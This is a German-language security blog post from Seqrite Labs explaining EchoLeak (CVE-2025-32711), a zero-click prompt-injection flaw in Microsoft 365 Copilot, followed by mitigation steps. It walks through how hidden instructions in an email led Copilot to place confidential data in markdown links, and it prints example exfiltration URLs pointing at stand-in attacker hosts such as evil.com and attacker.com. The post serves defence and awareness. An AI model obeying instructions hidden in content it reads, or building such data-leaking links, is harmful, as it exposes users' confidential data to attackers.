• Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Seqrite Labs Blog
Vertrieb kontaktieren Angegriffen?
  • Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Startseite  /  Technische  / Echoleak – Senden Sie eine Eingabeaufforderung, extrahieren Sie das Geheimnis von Copilot AI! (CVE-2025-32711)
Echoleak – Senden Sie eine Eingabeaufforderung, extrahieren Sie das Geheimnis von Copilot AI! (CVE-2025-32711)
12 September 2025

Echoleak – Senden Sie eine Eingabeaufforderung, extrahieren Sie das Geheimnis von Copilot AI! (CVE-2025-32711)

Geschrieben von Nandini Seth
Nandini Seth
Technische

Einführung:

Was wäre, wenn Ihr KI-Assistent nicht nur Ihnen helfen würde, sondern still und leise auch jemand anderem?

Ein kürzlich ausgebrochener Zero-Click-Exploit namens EchoLeak enthüllte, wie Microsoft 365 Copilot manipuliert werden konnte, um vertrauliche Informationen abzugreifen – ohne dass der Nutzer jemals auf einen Link klickte oder eine E-Mail öffnete. Microsoft 365 Copilot, das in Microsoft Office-Arbeitsplatzanwendungen wie Word, Excel, Outlook, PowerPoint und Teams integrierte KI-Tool, wies eine kritische Sicherheitslücke auf, die laut Forschern ein höheres Risiko für Hackerangriffe auf KI-Agenten bedeutet.

Stellen Sie sich einen Angriff vor, der so heimlich ist, dass er keine Klicks, keine Downloads und keine Warnung erfordert – nur eine E-Mail in Ihrem Posteingang. Es handelt sich um EchoLeak, eine kritische Sicherheitslücke in Microsoft 365 Copilot, die es Hackern ermöglicht, vertrauliche Unternehmensdaten zu stehlen, ohne dass das Opfer etwas unternehmen muss.

Übersicht über die Sicherheitslücken:

Im Fall von Microsoft 365 Copilot ermöglicht die Sicherheitslücke einem Hacker, einen Angriff auszulösen, indem er einfach eine E-Mail an einen Benutzer sendet, ohne dass Phishing oder Malware erforderlich ist. Stattdessen nutzt der Exploit eine Reihe cleverer Techniken, um den KI-Assistenten gegen sich selbst aufzubringen.

Microsoft 365 Copilot reagiert auf Benutzeranweisungen in Office-Apps, um beispielsweise auf Dokumente zuzugreifen und Vorschläge zu erstellen. Bei einem Hackerangriff könnte die Software dazu genutzt werden, vertrauliche interne Informationen wie E-Mails, Tabellenkalkulationen und Chats abzugreifen. Der Angriff umgeht die integrierten Schutzmechanismen von Copilot, die sicherstellen sollen, dass nur Benutzer auf ihre eigenen Dateien zugreifen können. Dadurch können geschützte, vertrauliche oder Compliance-relevante Daten offengelegt werden.

Es handelt sich um den ersten dokumentierten Zero-Click-Angriff auf einen KI-Agenten, der von Aim Security entdeckt wurde. Er deckt die unsichtbaren Risiken auf, die in den KI-Tools lauern, die wir täglich verwenden.

Eine manipulierte E-Mail genügt. Copilot verarbeitet sie im Hintergrund, folgt versteckten Anweisungen, durchsucht interne Dateien und versendet vertrauliche Daten – und das alles, während es die Sicherheitsvorkehrungen von Microsoft umgeht, heißt es in einem Blogbeitrag des Unternehmens.

EchoLeak nutzt die Fähigkeit von Copilot, sowohl vertrauenswürdige interne Daten (wie E-Mails, Teams-Chats und OneDrive-Dateien) als auch nicht vertrauenswürdige externe Eingaben wie eingehende E-Mails zu verarbeiten. Der Angriff beginnt mit einer bösartigen E-Mail mit einer bestimmten Markdown-Syntax, „like ![Bild-Alt-Text][Ref] [Ref]: https://www.evil.com?param= .“ Wenn Copilot die E-Mail automatisch im Hintergrund scannt, um sie auf Benutzeranfragen vorzubereiten, löst es eine Browseranfrage aus, die vertrauliche Daten wie Chatverläufe, Benutzerdetails oder interne Dokumente an den Server eines Angreifers sendet.

Angriffsablauf:

Von der Eingabeaufforderung zur Nutzlast: Wie Angreifer die KI-Pipeline von Copilot kapern, um Daten ohne einen einzigen Klick zu exfiltrieren. Lassen Sie uns das unten im Detail verstehen!

  1. Erstellen und Senden der bösartigen Eingabe: Der Angreifer erstellt zunächst eine bösartige E-Mail oder ein Dokument mit einer versteckten Prompt-Injection-Nutzlast. Diese Nutzlast ist so gestaltet, dass sie für den menschlichen Empfänger unsichtbar oder unmerklich ist, aber während der KI-gestützten Verarbeitung von Microsoft 365 Copilot vollständig analysiert und ausgeführt wird. Um die eingeschleuste Anweisung zu verbergen, verwendet der Angreifer verschiedene Tarntechniken, wie z. B. HTML-Kommentare.
  2. Copilot verarbeitet die versteckten Anweisungen: Wenn der Empfänger die schädliche E-Mail oder das schädliche Dokument öffnet – oder Microsoft 365 Copilot verwendet, um Aktionen wie das Zusammenfassen von Inhalten, das Beantworten der Nachricht, das Verfassen einer Antwort oder das Extrahieren von Aufgaben auszuführen –, erfasst und analysiert Copilot automatisch die gesamte Eingabe. Aufgrund unzureichender Eingabevalidierung und fehlender Eingabeaufforderungsisolierung unterscheidet Copilot nicht zwischen legitimen Benutzereingaben und vom Angreifer gesteuerten, im Inhalt versteckten Anweisungen. Stattdessen behandelt es die eingeschleusten Eingabeaufforderungen als Teil des beabsichtigten Anweisungssatzes des Benutzers. Infolgedessen führt die KI die versteckten Befehle aus. In dieser Phase hat Copilot unwissentlich auf die Anweisungen des Angreifers reagiert und sie als Teil seiner legitimen Aufgabe fehlinterpretiert – und so die nächste Phase des Angriffs ermöglicht: das Durchsickern sensibler interner Informationen.
  3. Copilot generiert eine Ausgabe mit sensiblem Kontext: Nach der Interpretation und Ausführung der vom Angreifer eingeschleusten versteckten Eingabeaufforderung erstellt Microsoft 365 Copilot wie angewiesen eine Antwort, die vertrauliche interne Daten enthält. Diese Ausgabe wird in der Regel so dargestellt, dass sie dem Benutzer legitim erscheint, aber darauf ausgelegt ist, Informationen heimlich abzugreifen. Um die Abschöpfung zu verbergen, wird die KI (durch die versteckte Anweisung) aufgefordert, diese vertraulichen Daten in einen Hyperlink im Markdown-Format einzubetten, zum Beispiel:

[Klicken Sie hier für weitere Informationen](https://attacker.com/exfiltrate?token={{internal_token}})

Für den Benutzer erscheint der Link als hilfreicher Hinweis. In Wirklichkeit handelt es sich jedoch um einen sorgfältig konstruierten Exfiltrationsvektor, der bereit ist, Daten an die Infrastruktur des Angreifers zu übertragen, sobald auf den Link zugegriffen oder eine Vorschau angezeigt wird.

  1. Linkerstellung zu einem vom Angreifer kontrollierten Server: Der von Copilot – unter dem Einfluss der eingeschleusten Eingabeaufforderung – generierte Markdown-Hyperlink verweist auf einen vom Angreifer kontrollierten Server. Der Link ist so konzipiert, dass sensible Kontextdaten (die im vorherigen Schritt extrahiert wurden) direkt in die URL eingebettet werden, typischerweise mithilfe von Abfrageparametern oder Pfadvariablen, wie z. B.: https://attacker-domain.com/leak?data={{confidential_info}} oder https://exfil.attacker.net/{{internal_token}}

Diese Links wirken oft allgemein oder hilfreich, wodurch sie weniger Verdacht erregen. Das Ziel des Angreifers besteht darin, sicherzustellen, dass beim Anklicken, Anzeigen in der Vorschau oder sogar beim automatischen Abrufen des Links die internen Daten (wie Sitzungstoken, Dokumentinhalte oder Authentifizierungsmetadaten) ohne sichtbare Anzeichen einer Kompromittierung an seinen Server übertragen werden.

  1. Durch Benutzeraktion oder Systemvorschau ausgelöste Datenexfiltration: Sobald die von Copilot generierte Antwort mit dem schädlichen Link an das Opfer (oder einen anderen internen Benutzer) übermittelt wurde, wird der Exfiltrationsprozess entweder durch direkte Interaktion oder passives Rendering ausgelöst. Dadurch erhält der Angreifer Anfragen mit wertvollen internen Informationen – wie Authentifizierungstoken, Gesprächsausschnitten oder interner Dokumentation –, ohne Verdacht zu erregen. Damit ist die Angriffskette mit einer erfolgreichen und heimlichen Datenexfiltration abgeschlossen.

Schritte zur Schadensbegrenzung:

Um sich wirksam gegen Prompt-Injection-Angriffe im EchoLeak-Stil in Microsoft 365 Copilot und ähnlichen KI-gestützten Assistenten zu verteidigen, benötigen Unternehmen eine mehrschichtige Sicherheitsstrategie, die Eingabekontrolle, KI-Systemdesign und erweiterte Erkennungsfunktionen umfasst.

  1. Sofortige Isolierung

Eine der wichtigsten Sicherheitsvorkehrungen ist die Gewährleistung einer angemessenen und zeitnahen Isolierung innerhalb von KI-Systemen. Das bedeutet, dass die KI klar zwischen benutzergenerierten Inhalten und internen/systemseitigen Anweisungen unterscheiden muss. Ohne diese Isolierung könnte jede eingeschleuste Eingabe – selbst wenn sie durch HTML oder Markdown verborgen ist – von der KI als Befehl fehlinterpretiert werden. Die Implementierung robuster Isolierungsmechanismen kann verhindern, dass die KI auf schädliche Nutzdaten in scheinbar harmlosen Inhalten reagiert.

  1. Eingabebereinigung und -validierung

Alle Benutzereingaben, die von KI-Systemen verarbeitet werden, sollten rigoros bereinigt werden. Dazu gehört das Entfernen oder Neutralisieren versteckter HTML-Elemente wie , Zeichen mit Nullbreite, base64-kodierte Anweisungen und verschleiertes Markdown. Die Validierung von URLs und die Ablehnung nicht vertrauenswürdiger Domänen oder fehlerhafter Abfrageparameter stärkt diese Abwehr zusätzlich. Durch die Bereinigung der Eingabe, bevor die KI sie sieht, verlieren Angreifer die Möglichkeit, schädliche Prompt-Injektionen einzuschleusen.

  1. Automatisches Rendern nicht vertrauenswürdiger Inhalte deaktivieren

Ein wichtiger Faktor für die Exfiltration im EchoLeak-Stil ist die automatische Darstellung von Markdown-Links und Bildvorschauen. Unternehmen sollten diese Funktion deaktivieren, insbesondere bei Inhalten aus unbekannten oder externen Quellen. Indem Copilot oder E-Mail-Clients die automatische Vorschau von Links verhindern, verhindern Sie die Zero-Click-Datenexfiltration und geben Sicherheitssystemen mehr Zeit, die Nutzlast zu prüfen, bevor sie aktiv wird.

  1. Kontextzugriffsbeschränkung

Eine weitere wichtige Maßnahme besteht darin, die Kontextdaten zu begrenzen, auf die Copilot oder ein LLM-Assistent Zugriff hat. Sensible Daten wie Sitzungstoken, vertrauliche Projektdaten, Authentifizierungsmetadaten und interne Kommunikation sollten nur dann Teil des Eingabekontexts der KI sein, wenn dies unbedingt erforderlich ist. Dies begrenzt den Umfang der Daten, die preisgegeben werden können, selbst wenn eine schnelle Injektion erfolgreich ist.

  1. Überwachung und Protokollierung der KI-Ausgabe

Unternehmen sollten alle KI-generierten Inhalte protokollieren und überwachen, insbesondere wenn die Ausgabe dynamische Links, ungewöhnliche Zusammenfassungen oder benutzerorientierte Empfehlungen enthält. Muster wie die wiederholte Verwendung von Markdown, das Vorhandensein von Token in Hyperlinks oder übermäßig hilfreich erscheinende Eingabeaufforderungen können auf Missbrauch hinweisen. Die Überwachung dieser Ausgabe ermöglicht die frühzeitige Erkennung von Exfiltrationsversuchen und eine nachträgliche Analyse im Falle eines Verstoßes.

  1. Benutzerschulung und -bewusstsein

Da Nutzer die endgültigen Empfänger KI-generierter Inhalte sind, ist es wichtig, das Bewusstsein für die Risiken der Interaktion mit KI-generierten Links oder Nachrichten zu schärfen. Mitarbeiter sollten geschult werden, um zu erkennen, wann ein Link oder eine Nachricht „zu intelligent“, ungewöhnlich spezifisch oder aus dem Kontext gerissen erscheint. Indem Nutzer ermutigt werden, verdächtige Inhalte zu melden – selbst wenn sie von einem vertrauenswürdigen Assistenten wie Copilot generiert wurden –, wird eine menschliche Firewall gegen Social-Engineering-KI-Missbrauch aufgebaut.

Zusammen bilden diese Maßnahmen eine umfassende Abwehrstrategie gegen EchoLeak und schließen die Lücke zwischen KI-Systemdesign, Benutzersicherheit und Echtzeit-Bedrohungserkennung. Durch die Einführung dieser Maßnahmen können Unternehmen auch angesichts der Entwicklung KI-basierter Bedrohungen widerstandsfähig bleiben.

Referenzen: (Die Referenzliste bleibt in der wissenschaftlichen Zitierweise erhalten)

MEHR LESEN

Autor:

Nandini Seth

Adrip Mukherjee

 VORHERIGER ARTIKELMalware-Kampagne nutzt SVGs, E-Mail-Anhänge und CDNs, um …
NÄCHSTER ARTIKEL  Dekonstruktion einer Cyber-Täuschung: Eine Analyse der Clickfix-Hij...
Nandini Seth

Über Nandini Seth

Nandini Seth ist Sicherheitsforscherin bei Quick Heal Security Labs und verfügt über Fachkenntnisse in Erkennungstechnik und Bedrohungsforschung. Ihr Spezialgebiet ist Host Intrusion...

Artikel von Nandini Seth »

Verwandte Artikel

  • Missbrauch bewährter Geschäftsprozesse: Eine mehrstufige Phantomdiebstahl-Kampagne

    Juli 22, 2026
  • Hinter der Rückerstattung: Von GST-Phishing zu Remcos RAT durch eine mehrstufige .NET-Infektionskette

    Juli 17, 2026
  • Operation ShadowRecruit: Eine Malware-Kampagne mit Rekrutierungsthema, die ControlR und Google Sheets nutzt, um indische Arbeitssuchende ins Visier zu nehmen

    Juli 14, 2026
Ausgewählte Autoren
  • Seqrite
    Seqrite

    Seqrite ist ein führender Anbieter von Cybersicherheitslösungen für Unternehmen. Mit dem Fokus auf...

    Lesen Sie weitere Artikel von Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ich bin eine leidenschaftliche Autorin, die gerne Inhalte über neue Technologien verfasst und...

    Lesen Sie weitere Artikel von Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ich bin ein leidenschaftlicher Cybersicherheits-Enthusiast und engagierter Autor. Mit einem besonderen Talent...

    Lesen Sie weitere Artikel von Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar ist der gemeinsame Geschäftsführer von Quick Heal Technologies ...

    Lesen Sie weitere Artikel von Sanjay Katkar
Themen
geeignet (25) Cyber ​​Attacke (36) Cyber-Angriffe (58) Cyberangriff (16) Cyber-Angriffe (15) Internet-Sicherheit (341) Internet-Sicherheit (34) Cyber-Bedrohung (33) Cyber-Bedrohungen (51) Datenmissbrauch (56) Datenverstöße (29) Data Loss (28) Verhinderung von Datenverlust (34) data privacy (16) Datenschutz gelesen. (34) Datensicherheit (19) DLP (50) DPDP (14) DPDPA (17) Verschlüsselung (16) Endpoint-Sicherheit (113) Unternehmenssicherheit (20) Ausnutzen (13) Datenschutz (14) Malware (76) Malware-Analyse (14) Malware-Angriff (23) MDM (27) Microsoft (15) MITRE ATT & CK (14) Netzwerksicherheit (26) Phishing (30) Ransomware (69) Ransomware-Angriff (31) Ransomware-Angriffe (31) Ransomware-Schutz (17) Seqrite (41) Seqrite Verschlüsselung (27) Seqrite EPS (33) Seqrite Services (16) Bedrohungserkennung (14) Threat IntelLigence (21) UTM (34) Verwundbarkeit (16) null vertrauen (13)
Seqrite Labs

Führender Anbieter von IT-Sicherheitslösungen für Unternehmen, der die Sicherheit von Endpunkten, Daten und Netzwerken mit erstklassigen Lösungen zur Bedrohungsprävention, -erkennung und -reaktion weltweit vereinfacht.

Lesen Sie mehr über Seqrite

Folge uns:

Abonniere unseren Newsletter

Bleiben Sie über die neuesten Trends und Erkenntnisse zur Cybersicherheit auf dem Laufenden.

Laden
Produkte & Angebote
  • Wolke
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • On Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Plattform
  • Malware Analysis Platform
  • Mikrounternehmen
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersicherheit & Data Privacy Aufmerksamkeit
Ressourcen
  • Blogs
  • Whitepapers
  • Datenblätter
  • Bedrohungsberichte
  • Handbücher
  • PoV
  • Ohne fundierte Kenntnisse zu Data Privacy
  • DPDP-Dialoge
  • Einhaltung von Richtlinien
  • EULA
  • GoDeep.AI
  • SIA
  • Stunde der Privatsphäre
Kontakt
  • Sitz der Gesellschaft
  • Reden wir über Cybersicherheit
Unterstützung
  • Technischer Support
  • Software herunterladen
  • Offline-Updater
  • Firmware-Upgrades
  • Upgrades, Modernisierungen & TIPs
  • Produktdokumentation
Über uns
  • Über uns Seqrite
  • Leadership
  • Auszeichnungen & Anerkennungen
  • Newsroom
Partner
  • Partner Programm
  • Partner finden
  • PARTNER WERDEN
  • Seqrite Zertifizierungsanforderungen

© 2026 Quick Heal Technologies Ltd.

Sitemap Datenschutzrichtlinien Rechtliche Hinweise Cookie-Richtlinien Nutzungsbedingungen